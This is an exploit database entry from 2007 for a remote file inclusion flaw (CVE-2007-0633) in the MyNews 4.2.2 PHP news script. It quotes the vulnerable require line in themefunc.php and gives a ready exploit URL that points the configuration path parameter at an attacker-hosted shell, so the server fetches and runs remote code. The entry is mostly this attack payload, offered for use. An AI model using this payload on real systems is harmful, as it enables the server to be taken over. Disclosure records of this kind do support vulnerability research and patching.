MyNews <= 4.2.2 themefunc.php Remote File Include Vulnerability

2007-01-30T00:00:00
ID EDB-ID:3228
Type exploitdb
Reporter GoLd_M
Modified 2007-01-30T00:00:00

Description

MyNews <= 4.2.2 (themefunc.php) Remote File Include Vulnerability. CVE-2007-0633. Webapps exploit for php platform

                                        
                                            -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

MyNews 4.2.2 &lt;=  Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by GolD_M(Mahmnood_ali)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL:
http://fresh.t-systems-sfr.com/unix/src/privat2/MyNews-4.2.2.tar.gz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

V.CODE: In : /include/themes/themefunc.php  &lt;&lt;&lt;&lt;=====&gt;&gt;&gt;&gt;      Line : 2
require($myNewsConf['path']['sys']['index'] .  '/include/libs/modules.lib.php');

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:
http://www.hedef.com/[mynews_path]/include/themes/themefunc.php?myNewsConf[path][sys][index]=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2007-01-30]